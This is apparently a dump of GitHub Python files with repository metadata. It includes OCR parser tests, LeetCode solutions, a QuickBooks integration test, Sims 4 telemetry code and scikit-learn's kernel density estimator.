from mmocr.datasets.preparers.parsers.wildreceipt_parser import (
WildreceiptKIEAnnParser, WildreceiptTextDetAnnParser)
from mmocr.utils import list_to_file
class TestWildReceiptParsers(unittest.TestCase):
def setUp(self) -> None:
self.root = tempfile.TemporaryDirectory()
fake_sample = dict(
file_name='test.jpg',
height=100,
width=100,
annotations=[
dict(
box=[
550.0, 190.0, 937.0, 190.0, 937.0, 104.0, 550.0, 104.0
],
text='test',
label=1,
),
dict(
box=[
1048.0, 211.0, 1074.0, 211.0, 1074.0, 196.0, 1048.0,
196.0
],
text='ATOREMGRTOMMILAZZO',
label=0,
)
])
fake_sample = [json.dumps(fake_sample)]
self.anno = osp.join(self.root.name, 'wildreceipt.txt')
list_to_file(self.anno, fake_sample)
def test_textdet_parsers(self):
parser = WildreceiptTextDetAnnParser(self.root.name)
samples = parser.parse_files(self.anno, 'train')
self.assertEqual(len(samples), 1)
self.assertEqual(osp.basename(samples[0][0]), 'test.jpg')
instances = samples[0][1]
self.assertEqual(len(instances), 2)
self.assertIn('poly', instances[0])
self.assertIn('text', instances[0])
self.assertIn('ignore', instances[0])
self.assertEqual(instances[0]['text'], 'test')
self.assertEqual(instances[1]['ignore'], True)
def test_kie_parsers(self):
parser = WildreceiptKIEAnnParser(self.root.name)
samples = parser.parse_files(self.anno, 'train')
self.assertEqual(len(samples), 1)
| [
"islam.bakr.2017@gmail.com"
] | islam.bakr.2017@gmail.com |
3536260316053a84bfe9507e9c17029afa97708e | 3c9004d310ef124d6eb3872d7e6b02799a4dfbfb | /面向对象/多重继承.py | 33e0fe0390bccf03408e5f7415b2fa8bdc15166c | [] | no_license | iguess1220/python | c2eae6011a4806e4a7f68ef9351dbffc2d9635f3 | 3be7fd4e130247715bc89525b3ab66a755863480 | refs/heads/master | 2020-04-08T22:33:01.218992 | 2018-12-18T08:09:23 | 2018-12-18T08:09:23 | 112,563,066 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 421 | py | class Animal:
pass
class Mammal(Animal):
def body(self):
print("eat milk")
class Bird(Animal):
def body(self):
print("有翅膀")
class Runable(Animal):
def run(self):
print("running")
class Flyable(Animal):
def fly(self):
print("fly")
class Bat(Mammal,Flyable):
pass
b = Bat()
b.fly()
class tuoniao(Bird,Runable,Flyable):
pass
c = tuoniao()
c.run()
c.body()
| [
"17710890916@163.com"
] | 17710890916@163.com |
b9c1b57faec38343cc0531c69ae241bf31fc54fd | bc8a0e87417add0325c9124ee847efaf88d2daa1 | /PycharmProjects/week5/coursera_forms/formdummy/views.py | 1409ed3df327284e005f02b1e0ab417cf904ce4c | [] | no_license | Ivanlasich/python | f0034426ea91d956d4d47a0a41e099785a6ddf1a | d8ed501537581f01d07733bd81911d0f523d7bfc | refs/heads/master | 2022-12-12T21:06:46.473608 | 2019-12-08T19:03:41 | 2019-12-08T19:03:41 | 226,704,894 | 0 | 0 | null | 2022-12-08T02:40:00 | 2019-12-08T17:28:07 | Python | UTF-8 | Python | false | false | 242 | py | from django.shortcuts import render
from django.views import View
import requests
class FormDummyView(View):
def get(self, request):
r = requests.get('https://api.github.com/events')
return render(request,'form.html',{})
| [
"ivanlazichny@gmail.com"
] | ivanlazichny@gmail.com |
3bc8e2ac6257c4f60d8e100e9230c5b365aa231f | c83fe2005a44b436a8be1e0787834a8a93b2024b | /scripts/dynamic_programming/longest_common_substring.py | 6c200f0878b158a8bb9db30e056545648c26fb10 | [] | no_license | wulfebw/algorithms | 9eb0bacd8a7851d28beecb608a895925e26f543b | cbae6aba464a021ada842adb4eaed9dbd16dc0f2 | refs/heads/master | 2021-01-19T02:28:12.666777 | 2019-05-02T02:52:08 | 2019-05-02T02:52:08 | 49,041,959 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 769 | py | '''
I think the difference between finding the lcsubstring and lcsubseq is that in the substring case you erase your progress, whereas with the subsequence you do not
'''
import numpy as np
def lcs(a,b):
n, m = len(a), len(b)
v = np.zeros((n+1, m+1))
for i in range(n):
for j in range(m):
if a[i] == b[j]:
v[i+1,j+1] = v[i,j] + 1
return int(v.max())
if __name__ == '__main__':
inputs = [
('GeeksforGeeks', 'GeeksQuiz'),
('abcdxyz', 'xyzabcd'),
('zxabcdezy', 'yzabcdezx'),
('aabbbccccddd', 'dddddbbbbbbaaaaacccc')
]
expect = [
5,
4,
6,
4
]
for (i,e) in zip(inputs, expect):
print(e)
print(lcs(*i))
print()
| [
"wulfebw@stanford.edu"
] | wulfebw@stanford.edu |
5fecb3d42317d7666bb4cf7e590626bd078063ef | d7998eacdd2ecd9623b520ec1c36524a2c3ab827 | /conwhat/__main__.py | 86cee1f77db13de34af7a5a1156f2579c0a8759e | [
"BSD-3-Clause"
] | permissive | raamana/ConWhAt | d50674e3d790704d8105eb69dfa96e8164c0c402 | 098ae8088f6d320ed414355be3d31a65b8bf43de | refs/heads/master | 2021-08-20T00:35:54.446433 | 2017-11-27T20:17:13 | 2017-11-27T20:17:13 | 112,232,400 | 0 | 0 | null | 2017-11-27T18:26:35 | 2017-11-27T18:26:34 | null | UTF-8 | Python | false | false | 488 | py |
def main():
"Entry point."
raise NotImplementedError('The command line interface for ConWhAt is not currently supported. '
'Please use it via API in a script or jupyter notebook. \n'
'Example usages : \n'
'from conwhat import StreamConnAtlas \n'
'from conwhat import VolConnAtlas \n'
'')
if __name__ == '__main__':
main() | [
"raamana@gmail.com"
] | raamana@gmail.com |
f00f2c84d5ce3a1e7902935d2bd5bc439c1b790b | 59212f32b5b3a274fde0875101b37aafe72891f1 | /crawller/selenium_base/classifier.py | 4da4ec8aaf59ec25d2fcb3bff2b7ea2920d5af49 | [] | no_license | afcarl/rehabilitation | b2dd1626deaa606469d7150982f130a2272dd3b0 | 67c6719d805201e0c9ee97fe9130398a9b93881a | refs/heads/master | 2020-03-22T09:59:09.623992 | 2017-02-03T01:06:05 | 2017-02-03T01:06:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,126 | py | from sklearn.feature_extraction.text import CountVectorizer
import json
from sklearn import svm
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import cross_val_score
import random
from nltk.tokenize import sent_tokenize, word_tokenize
from functools import reduce
import numpy as np
from sklearn.feature_selection import SelectFromModel
from sklearn.feature_selection import chi2
from sklearn.feature_selection import SelectKBest
from sklearn import tree
from sklearn import linear_model
def get_dataset_stat_health():
dataset = {}
dataset["data"] = []
dataset["target"] = []
handler = open("health.txt", "r")
list = json.load(handler)
grades = []
for pairs in list:
for grade,text in pairs.items():
if grade == "MAX":
grades.append(99999)
else:
grades.append(int(grade[0:-1]))
grades.sort()
idx = 0
for grade in grades:
if grade == 99999:
gradex = "MAX"
else:
gradex = "".join([str(grade), "L"])
text = "".join([pairs[gradex], " "])
sents = sent_tokenize(text)
sent_avg_len = 0
sent_cnt = 1
word_avg_len = 0
word_cnt = 1
for sent in sents:
for word in word_tokenize(sent):
word_avg_len += len(word)
word_cnt += 1
sent_avg_len += len(word_tokenize(sent))
sent_cnt += 1
sent_avg_len /= sent_cnt
word_avg_len /= word_cnt
feature = []
feature.append(sent_avg_len)
feature.append(word_avg_len)
dataset["data"].append(feature)
dataset["target"].append(idx)
idx += 1
grades.clear()
return dataset
def get_dataset_text_health():
dataset = {}
dataset["data"] = []
dataset["target"] = []
handler = open("health.txt", "r")
list = json.load(handler)
grades = []
for pairs in list:
for grade,text in pairs.items():
if grade == "MAX":
grades.append(99999)
else:
grades.append(int(grade[0:-1]))
grades.sort()
idx = 0
for grade in grades:
if grade == 99999:
gradex = "MAX"
else:
gradex = "".join([str(grade), "L"])
text = "".join([pairs[gradex], " "])
loop_idx = idx
#while loop_idx >= 0:
dataset["data"].append(text)
dataset["target"].append(idx)
# loop_idx -= 1
idx += 1
grades.clear()
return dataset
def get_sample_dataset():
dataset = {}
dataset["data"] = []
dataset["target"] = []
dataset["data"] = ["a aa", "aa a", "a aaa", "a aaa","a aa", "aa a", "a aaa", "a aaa","a aa", "aa a", "a aaa", "a aaa","c cc","cc ","c ","cc ","c ","c "]
dataset["target"] = [1,1,1,1,1,1,1,1,1,1,1,1,3,3,3,3,3,3]
return dataset
def get_dataset_text_all():
dataset = {}
dataset["data"] = []
dataset["target"] = []
handler = open("news.txt", "r")
list = json.load(handler)
for pairs in list:
for grade, text in pairs.items():
dataset["data"].append(text)
dataset["target"].append(grade)
return dataset
def get_dataset_stat_all():
dataset = {}
dataset["data"] = []
dataset["target"] = []
handler = open("news.txt", "r")
list = json.load(handler)
for pairs in list:
for grade, text in pairs.items():
dataset["target"].append(grade)
text = "".join([text, " "])
sents = sent_tokenize(text)
sent_avg_len = 0
sent_cnt = 1
word_avg_len = 0
word_cnt = 1
for sent in sents:
for word in word_tokenize(sent):
word_avg_len += len(word)
word_cnt += 1
sent_avg_len += len(word_tokenize(sent))
sent_cnt += 1
sent_avg_len /= sent_cnt
word_avg_len /= word_cnt
feature = []
feature.append(sent_avg_len)
feature.append(word_avg_len)
dataset["data"].append(feature)
return dataset
dataset1 = get_dataset_text_all()
dataset2 = get_dataset_stat_all()
print("finish get dataset")
ngrams = [2,3,4,5,6,7]
Cs = [10]
features = [100000, 150000,200000,240000]
# samp_order = random.sample(range(len(y)),len(y))
# X = [X[ind] for ind in samp_order]
# y = [y[ind] for ind in samp_order]
if False:
import pydotplus
print("for interpretation")
# word-level
count_vect = CountVectorizer(min_df=0, max_df=9999, binary=True, lowercase=True, stop_words=None,
ngram_range=(1, 20))
X1 = count_vect.fit_transform(dataset1["data"])
y1 = dataset1["target"]
# feature-level
X2 = dataset2["data"]
y2 = dataset2["target"]
y = y1
X1 = X1.todense()
X = np.append(X1, np.matrix(X2), axis=1)
#populate col names
cols = ["UNK"] * X.shape[1]
for word, idx in count_vect.vocabulary_.items():
cols[idx] = word
cols[len(cols) - 1] = "Word Average"
cols[len(cols) - 2] = "Sentence Average"
classes = ["grade 2-3", "grade 4-6", "grade 7-8", "grade 9-10", "grade 11-12"]
clf = tree.DecisionTreeClassifier(criterion = "entropy")
clf.fit(X, y)
dot_data = tree.export_graphviz(clf, out_file=None, feature_names=cols, class_names=classes, filled=True, rounded=True, special_characters=True)
graph = pydotplus.graph_from_dot_data(dot_data)
graph.write_pdf("tree2.pdf")
if True:
for feature in features:
for ngram in ngrams:
# word-level
count_vect = CountVectorizer(min_df=0, max_df=9999, binary=True, lowercase=True, stop_words=None,
ngram_range=(1, ngram))
X1 = count_vect.fit_transform(dataset1["data"])
y1 = dataset1["target"]
# print("finish", "transform")
# feature-level
X2 = dataset2["data"]
y2 = dataset2["target"]
y = y1
if feature < X1.shape[1]:
X1 = SelectKBest(chi2, k=feature).fit_transform(X1, y)
X1 = X1.todense()
# print("finish", "Kbest")
X = np.concatenate((X1, np.matrix(X2)), axis=1)
# print("finish", "append")
#for c in Cs:
key = " ".join(["feature", str(feature), "c", str(10), "ngram", str(ngram)])
try:
clf = tree.DecisionTreeClassifier()
# clf = LogisticRegression(multi_class='ovr', C=10)
# clf = svm.SVC(C=c, kernel='linear')
scores = cross_val_score(clf, X, y, cv=10, n_jobs=1, verbose=0)
print(key, reduce(lambda x, y: x + y, scores) / len(scores))
except Exception as exp:
print("error: ", key, "\t", exp)
| [
"zhaosanqiang916@gmail.com"
] | zhaosanqiang916@gmail.com |
b9b83013d4f1fab6c0ae403a06f74021bb5f9f05 | dec494542217437afa7f38e8703328b25b183cb8 | /999.py | 207d2953c1b147a171c8398e49277b1fa5063386 | [] | no_license | Transi-ent/LeetcodeSolver | ee44c9c4d5bce9f11c079c5b27b4b967790cb5cd | a89e19753666657a6f15c1be589b9b2dbd4b6c84 | refs/heads/master | 2021-04-16T20:37:34.710175 | 2021-02-24T03:51:43 | 2021-02-24T03:51:43 | 249,383,432 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,517 | py | class Solution:
"""
先进行遍历,求出白车所在的位置(Row,Col),
再次进行遍历,查询所在的行和列可以捕获的卒
"""
def numRookCaptures(self, board: list) -> int:
r, c = None, None
flag = False
for i in range(8):
for j in range(8):
if board[i][j]=="R":
r, c = i, j
flag = True
break
if flag:
break
up, down, left, right = 0,0,0,0
hasBishop = False
for i in range(8):
for j in range(8):
if j==c and i<r:
if board[i][j]=="B":
up = 0
elif board[i][j]=='p':
up = 1
elif i==r:
if j<c:
if board[i][j]=='p':
left = 1
elif board[i][j]=="B":
left = 0
elif j>c:
if board[i][j]=="B":
break
elif board[i][j]=='p':
right = 1
elif i>r and j==c:
if board[i][j]=='B':
hasBishop = True
break
elif board[i][j]=='p':
down = 1
if hasBishop:
break
return up+down+left+right
| [
"1305113016@qq.com"
] | 1305113016@qq.com |
cfe8be1936ffb48572be726f0bcc6d06589a4f7f | 070b693744e7e73634c19b1ee5bc9e06f9fb852a | /python/problem-bit-manipulation/reverse_bits.py | db3e7500f8dee52f9f70c219edb95dbf38ef56fb | [] | no_license | rheehot/practice | a7a4ce177e8cb129192a60ba596745eec9a7d19e | aa0355d3879e61cf43a4333a6446f3d377ed5580 | refs/heads/master | 2021-04-15T22:04:34.484285 | 2020-03-20T17:20:00 | 2020-03-20T17:20:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 661 | py | # https://leetcode.com/problems/reverse-bits
# 33.75%
class Solution:
# @param n, an integer
# @return an integer
def reverseBits(self, n):
bits, bit = [], 0x1
for i in range(32):
print('bit {}, n & bit {}'.format(bit, n & bit))
if 0 == n & bit:
bits.append('0')
else:
bits.append('1')
bit <<= 1
print(bits)
return int(''.join(bits), 2)
s = Solution()
data = [(43261596, 964176192)]
for n, expected in data:
real = s.reverseBits(n)
print('{}, expected {}, real {}, result {}'.format(n, expected, real, expected == real))
| [
"morpheus.0@kakaocorp.com"
] | morpheus.0@kakaocorp.com |
a841c652172a7aa0a01324d759390454a36c21f2 | c7044393f89ffee67f30a277019372506d3b0af4 | /tests/integration/test_billpayment.py | c16f8a530034dc79212393f29a91faa2cace5663 | [
"MIT"
] | permissive | stephanelsmith/python-quickbooks | 66845f54aef86dc43a081dd49345a9c090642433 | 20fd4b6e92fe5a5e8dac43daefb0568f0465b62c | refs/heads/master | 2020-06-17T19:22:15.175039 | 2019-07-09T14:34:44 | 2019-07-09T14:34:44 | 196,022,916 | 0 | 0 | MIT | 2019-07-09T14:16:53 | 2019-07-09T14:16:52 | null | UTF-8 | Python | false | false | 2,408 | py | import os
import unittest
from datetime import datetime
from quickbooks.auth import Oauth1SessionManager
from quickbooks.client import QuickBooks
from quickbooks.objects.account import Account
from quickbooks.objects.bill import Bill
from quickbooks.objects.billpayment import BillPayment, BillPaymentLine, CheckPayment
from quickbooks.objects.vendor import Vendor
class BillPaymentTest(unittest.TestCase):
def setUp(self):
self.session_manager = Oauth1SessionManager(
sandbox=True,
consumer_key=os.environ.get('CONSUMER_KEY'),
consumer_secret=os.environ.get('CONSUMER_SECRET'),
access_token=os.environ.get('ACCESS_TOKEN'),
access_token_secret=os.environ.get('ACCESS_TOKEN_SECRET'),
)
self.qb_client = QuickBooks(
session_manager=self.session_manager,
sandbox=True,
company_id=os.environ.get('COMPANY_ID')
)
self.account_number = datetime.now().strftime('%d%H%M')
self.name = "Test Account {0}".format(self.account_number)
def test_create(self):
bill_payment = BillPayment()
bill_payment.PayType = "Check"
bill_payment.TotalAmt = 200
bill_payment.PrivateNote = "Private Note"
vendor = Vendor.all(max_results=1, qb=self.qb_client)[0]
bill_payment.VendorRef = vendor.to_ref()
bill_payment.CheckPayment = CheckPayment()
account = Account.where("AccountSubType = 'Checking'", qb=self.qb_client)[0]
bill_payment.CheckPayment.BankAccountRef = account.to_ref()
ap_account = Account.where("AccountSubType = 'AccountsPayable'", qb=self.qb_client)[0]
bill_payment.APAccountRef = ap_account.to_ref()
bill = Bill.all(max_results=1, qb=self.qb_client)[0]
line = BillPaymentLine()
line.LinkedTxn.append(bill.to_linked_txn())
line.Amount = 200
bill_payment.Line.append(line)
bill_payment.save(qb=self.qb_client)
query_bill_payment = BillPayment.get(bill_payment.Id, qb=self.qb_client)
self.assertEquals(query_bill_payment.PayType, "Check")
self.assertEquals(query_bill_payment.TotalAmt, 200.0)
self.assertEquals(query_bill_payment.PrivateNote, "Private Note")
self.assertEquals(len(query_bill_payment.Line), 1)
self.assertEquals(query_bill_payment.Line[0].Amount, 200.0)
| [
"edward.emanuel@gmail.com"
] | edward.emanuel@gmail.com |
b74b3f64c971504ff7beaf4a8b24756ffbbd7933 | a38180435ac5786185c0aa48891c0aed0ab9d72b | /S4/S4 Library/simulation/sims/university/university_telemetry.py | 3d65d5f99c17da1c0b69dc34bea11a7d0f241659 | [
"CC-BY-4.0"
] | permissive | NeonOcean/Environment | e190b6b09dd5dbecba0a38c497c01f84c6f9dc7d | ca658cf66e8fd6866c22a4a0136d415705b36d26 | refs/heads/master | 2022-12-03T13:17:00.100440 | 2021-01-09T23:26:55 | 2021-01-09T23:26:55 | 178,096,522 | 1 | 1 | CC-BY-4.0 | 2022-11-22T20:24:59 | 2019-03-28T00:38:17 | Python | UTF-8 | Python | false | false | 3,176 | py | import build_buy
import services
import sims4.telemetry
import telemetry_helper
TELEMETRY_GROUP_UNIVERSITY = 'UNIV'
TELEMETRY_HOOK_UNIVERSITY_HOUSING = 'UNHO'
TELEMETRY_HOOK_UNIVERSITY_ACCEPTANCE = 'UNAC'
TELEMETRY_HOOK_UNIVERSITY_ENROLL = 'UNEN'
TELEMETRY_HOOK_UNIVERSITY_TERM = 'UNTE'
TELEMETRY_HOOK_UNIVERSITY_COURSE = 'UNCO'
TELEMETRY_HOOK_UNIVERSITY_TUITION = 'UNTU'
TELEMETRY_FIELD_IS_ON_CAMPUS_HOUSING = 'ioch'
TELEMETRY_FIELD_SIM_AGE = 'sage'
TELEMETRY_FIELD_UNIVERSITY_MAJOR = 'umaj'
TELEMETRY_FIELD_TERM_GPA = 'tgpa'
TELEMETRY_FIELD_COURSE_ID = 'cour'
TELEMETRY_FIELD_COURSE_GRADE = 'grad'
TELEMETRY_FIELD_TUITION_COST = 'tcst'
TELEMETRY_FIELD_IS_USING_LOAN = 'iuln'
university_telemetry_writer = sims4.telemetry.TelemetryWriter(TELEMETRY_GROUP_UNIVERSITY)
logger = sims4.log.Logger('UniversityTelemetry', default_owner='mkartika')
class UniversityTelemetry:
@staticmethod
def send_university_housing_telemetry(zone_id):
if zone_id is None:
return
is_university_housing = False
if zone_id != 0:
venue_manager = services.get_instance_manager(sims4.resources.Types.VENUE)
venue = venue_manager.get(build_buy.get_current_venue(zone_id))
is_university_housing = venue.is_university_housing
with telemetry_helper.begin_hook(university_telemetry_writer, TELEMETRY_HOOK_UNIVERSITY_HOUSING) as hook:
hook.write_bool(TELEMETRY_FIELD_IS_ON_CAMPUS_HOUSING, is_university_housing)
@staticmethod
def send_acceptance_telemetry(sim_age):
with telemetry_helper.begin_hook(university_telemetry_writer, TELEMETRY_HOOK_UNIVERSITY_ACCEPTANCE) as hook:
hook.write_enum(TELEMETRY_FIELD_SIM_AGE, sim_age)
@staticmethod
def send_university_enroll_telemetry(sim_info, major):
with telemetry_helper.begin_hook(university_telemetry_writer, TELEMETRY_HOOK_UNIVERSITY_ENROLL, sim_info=sim_info) as hook:
hook.write_int(TELEMETRY_FIELD_UNIVERSITY_MAJOR, major.guid64)
@staticmethod
def send_university_term_telemetry(sim_info, major, gpa):
with telemetry_helper.begin_hook(university_telemetry_writer, TELEMETRY_HOOK_UNIVERSITY_TERM, sim_info=sim_info) as hook:
hook.write_int(TELEMETRY_FIELD_UNIVERSITY_MAJOR, major.guid64)
hook.write_float(TELEMETRY_FIELD_TERM_GPA, gpa)
@staticmethod
def send_university_course_telemetry(sim_info, major, course_data, grade):
with telemetry_helper.begin_hook(university_telemetry_writer, TELEMETRY_HOOK_UNIVERSITY_COURSE, sim_info=sim_info) as hook:
hook.write_int(TELEMETRY_FIELD_UNIVERSITY_MAJOR, major.guid64)
hook.write_int(TELEMETRY_FIELD_COURSE_ID, course_data.guid64)
hook.write_int(TELEMETRY_FIELD_COURSE_GRADE, grade)
@staticmethod
def send_university_tuition_telemetry(sim_info, tuition_cost, is_using_loan):
with telemetry_helper.begin_hook(university_telemetry_writer, TELEMETRY_HOOK_UNIVERSITY_TUITION, sim_info=sim_info) as hook:
hook.write_int(TELEMETRY_FIELD_TUITION_COST, tuition_cost)
hook.write_bool(TELEMETRY_FIELD_IS_USING_LOAN, is_using_loan)
| [
"40919586+NeonOcean@users.noreply.github.com"
] | 40919586+NeonOcean@users.noreply.github.com |
c92b9ff5f6511b9cfc629cace269b98af358d96a | 3f28b697f570ded0502de70c706200005ab62525 | /env/lib/python2.7/site-packages/sklearn/neighbors/kde.py | 8d940264f4374324ce9e5916eab9b797b0fd9d09 | [
"MIT"
] | permissive | Ram-Aditya/Healthcare-Data-Analytics | 5387e41ad8e56af474e10fa2d1c9d8a2847c5ead | d1a15d2cc067410f82a9ded25f7a782ef56b4729 | refs/heads/master | 2022-12-09T12:49:59.027010 | 2019-11-23T20:10:55 | 2019-11-23T20:10:55 | 223,639,339 | 0 | 1 | MIT | 2022-11-22T00:37:48 | 2019-11-23T19:06:20 | Jupyter Notebook | UTF-8 | Python | false | false | 7,925 | py | """
Kernel Density Estimation
-------------------------
"""
# Author: Jake Vanderplas <jakevdp@cs.washington.edu>
import numpy as np
from scipy.special import gammainc
from ..base import BaseEstimator
from ..utils import check_array, check_random_state
from ..utils.extmath import row_norms
from .ball_tree import BallTree, DTYPE
from .kd_tree import KDTree
# Names of the smoothing kernels accepted by KernelDensity's ``kernel``
# parameter (validated in ``KernelDensity.__init__``).
VALID_KERNELS = ['gaussian', 'tophat', 'epanechnikov', 'exponential', 'linear',
                 'cosine']
# Mapping from the user-facing ``algorithm`` string to the tree class that
# implements it; also used to validate explicit algorithm choices.
TREE_DICT = {'ball_tree': BallTree, 'kd_tree': KDTree}


# TODO: implement a brute force version for testing purposes
# TODO: bandwidth estimation
# TODO: create a density estimation base class?
class KernelDensity(BaseEstimator):
"""Kernel Density Estimation
Parameters
----------
bandwidth : float
The bandwidth of the kernel.
algorithm : string
The tree algorithm to use. Valid options are
['kd_tree'|'ball_tree'|'auto']. Default is 'auto'.
kernel : string
The kernel to use. Valid kernels are
['gaussian'|'tophat'|'epanechnikov'|'exponential'|'linear'|'cosine']
Default is 'gaussian'.
metric : string
The distance metric to use. Note that not all metrics are
valid with all algorithms. Refer to the documentation of
:class:`BallTree` and :class:`KDTree` for a description of
available algorithms. Note that the normalization of the density
output is correct only for the Euclidean distance metric. Default
is 'euclidean'.
atol : float
The desired absolute tolerance of the result. A larger tolerance will
generally lead to faster execution. Default is 0.
rtol : float
The desired relative tolerance of the result. A larger tolerance will
generally lead to faster execution. Default is 1E-8.
breadth_first : boolean
If true (default), use a breadth-first approach to the problem.
Otherwise use a depth-first approach.
leaf_size : int
Specify the leaf size of the underlying tree. See :class:`BallTree`
or :class:`KDTree` for details. Default is 40.
metric_params : dict
Additional parameters to be passed to the tree for use with the
metric. For more information, see the documentation of
:class:`BallTree` or :class:`KDTree`.
"""
def __init__(self, bandwidth=1.0, algorithm='auto',
kernel='gaussian', metric="euclidean", atol=0, rtol=0,
breadth_first=True, leaf_size=40, metric_params=None):
self.algorithm = algorithm
self.bandwidth = bandwidth
self.kernel = kernel
self.metric = metric
self.atol = atol
self.rtol = rtol
self.breadth_first = breadth_first
self.leaf_size = leaf_size
self.metric_params = metric_params
# run the choose algorithm code so that exceptions will happen here
# we're using clone() in the GenerativeBayes classifier,
# so we can't do this kind of logic in __init__
self._choose_algorithm(self.algorithm, self.metric)
if bandwidth <= 0:
raise ValueError("bandwidth must be positive")
if kernel not in VALID_KERNELS:
raise ValueError("invalid kernel: '{0}'".format(kernel))
def _choose_algorithm(self, algorithm, metric):
# given the algorithm string + metric string, choose the optimal
# algorithm to compute the result.
if algorithm == 'auto':
# use KD Tree if possible
if metric in KDTree.valid_metrics:
return 'kd_tree'
elif metric in BallTree.valid_metrics:
return 'ball_tree'
else:
raise ValueError("invalid metric: '{0}'".format(metric))
elif algorithm in TREE_DICT:
if metric not in TREE_DICT[algorithm].valid_metrics:
raise ValueError("invalid metric for {0}: "
"'{1}'".format(TREE_DICT[algorithm],
metric))
return algorithm
else:
raise ValueError("invalid algorithm: '{0}'".format(algorithm))
def fit(self, X, y=None):
"""Fit the Kernel Density model on the data.
Parameters
----------
X : array_like, shape (n_samples, n_features)
List of n_features-dimensional data points. Each row
corresponds to a single data point.
"""
algorithm = self._choose_algorithm(self.algorithm, self.metric)
X = check_array(X, order='C', dtype=DTYPE)
kwargs = self.metric_params
if kwargs is None:
kwargs = {}
self.tree_ = TREE_DICT[algorithm](X, metric=self.metric,
leaf_size=self.leaf_size,
**kwargs)
return self
def score_samples(self, X):
"""Evaluate the density model on the data.
Parameters
----------
X : array_like, shape (n_samples, n_features)
An array of points to query. Last dimension should match dimension
of training data (n_features).
Returns
-------
density : ndarray, shape (n_samples,)
The array of log(density) evaluations.
"""
# The returned density is normalized to the number of points.
# For it to be a probability, we must scale it. For this reason
# we'll also scale atol.
X = check_array(X, order='C', dtype=DTYPE)
N = self.tree_.data.shape[0]
atol_N = self.atol * N
log_density = self.tree_.kernel_density(
X, h=self.bandwidth, kernel=self.kernel, atol=atol_N,
rtol=self.rtol, breadth_first=self.breadth_first, return_log=True)
log_density -= np.log(N)
return log_density
def score(self, X, y=None):
"""Compute the total log probability under the model.
Parameters
----------
X : array_like, shape (n_samples, n_features)
List of n_features-dimensional data points. Each row
corresponds to a single data point.
Returns
-------
logprob : float
Total log-likelihood of the data in X.
"""
return np.sum(self.score_samples(X))
    def sample(self, n_samples=1, random_state=None):
        """Generate random samples from the model.
        Currently, this is implemented only for gaussian and tophat kernels.
        Parameters
        ----------
        n_samples : int, optional
            Number of samples to generate. Defaults to 1.
        random_state : RandomState or an int seed (0 by default)
            A random number generator instance.
        Returns
        -------
        X : array_like, shape (n_samples, n_features)
            List of samples.
        """
        # TODO: implement sampling for other valid kernel shapes
        if self.kernel not in ['gaussian', 'tophat']:
            raise NotImplementedError()
        data = np.asarray(self.tree_.data)

        rng = check_random_state(random_state)
        # Pick n_samples training points (with replacement) to center the
        # kernel draws on.
        i = rng.randint(data.shape[0], size=n_samples)
        if self.kernel == 'gaussian':
            return np.atleast_2d(rng.normal(data[i], self.bandwidth))
        elif self.kernel == 'tophat':
            # we first draw points from a d-dimensional normal distribution,
            # then use an incomplete gamma function to map them to a uniform
            # d-dimensional tophat distribution.
            dim = data.shape[1]
            X = rng.normal(size=(n_samples, dim))
            s_sq = row_norms(X, squared=True)
            # Radial rescaling factor that maps gaussian draws onto a
            # uniform ball of radius `bandwidth`.
            correction = (gammainc(0.5 * dim, 0.5 * s_sq) ** (1. / dim)
                          * self.bandwidth / np.sqrt(s_sq))
            return data[i] + X * correction[:, np.newaxis]
| [
"ramaditya.danbrown@gmail.com"
] | ramaditya.danbrown@gmail.com |
3c66085bda3a774bb6434ae9fc4233056dbbd85b | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_2751486_0/Python/alexamici/A.py | 1cade536bfb429e80d1ec2be059a5be3fb11af7c | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 1,387 | py | """Usage:
pypy X.py < X-size.in > X-size.out
or sometimes
python X.py < X-size.in > X-size.out
"""
def setup(infile):
#C = {}
return locals()
def reader(testcase, infile, C=None, **ignore):
    """Read one test case: a single line holding the name and an integer.

    Returns a dict of everything in scope (mirrors the ``locals()`` idiom
    used throughout these contest templates).
    """
    T = infile.next().split()
    return {'testcase': testcase, 'infile': infile, 'C': C,
            'ignore': ignore, 'T': T}
def solver(testcase, N=None, P=None, I=None, T=None, S=None, C=None, **ignore):
    """Count substrings of the name that contain a run of n consonants.

    A substring [start, stop] qualifies when some index k with
    start + n - 1 <= k <= stop ends a run of at least n consecutive
    consonants.
    """
    name, n = T[0], int(T[1])

    # Indices that terminate a run of >= n consonants.
    run_ends = set()
    run = 0
    for idx, ch in enumerate(name):
        if ch in 'aeiou':
            run = 0
        else:
            run += 1
            if run >= n:
                run_ends.add(idx)

    total = 0
    size = len(name)
    for start in range(size):
        for stop in range(start + n - 1, size):
            if any(k in run_ends for k in range(start + n - 1, stop + 1)):
                total += 1
    return 'Case #%s: %s\n' % (testcase, total)
if __name__ == '__main__':
    import sys
    # First stdin line holds the number of test cases.  Note the Python 2
    # iterator protocol (.next(), xrange) used throughout this script.
    T = int(sys.stdin.next())
    common = setup(sys.stdin)
    for t in xrange(1, T+1):
        sys.stdout.write(solver(**reader(t, **common)))
| [
"eewestman@gmail.com"
] | eewestman@gmail.com |
386d31faf6a46dfb07690904507a892a1c2708d7 | 43e0cfda9c2ac5be1123f50723a79da1dd56195f | /python/paddle/fluid/tests/unittests/test_eager_run_program.py | a04c544e9025732bcea5e8f43a232c46e494c447 | [
"Apache-2.0"
] | permissive | jiangjiajun/Paddle | 837f5a36e868a3c21006f5f7bb824055edae671f | 9b35f03572867bbca056da93698f36035106c1f3 | refs/heads/develop | 2022-08-23T11:12:04.503753 | 2022-08-11T14:40:07 | 2022-08-11T14:40:07 | 426,936,577 | 0 | 0 | Apache-2.0 | 2022-02-17T03:43:19 | 2021-11-11T09:09:28 | Python | UTF-8 | Python | false | false | 4,235 | py | # Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
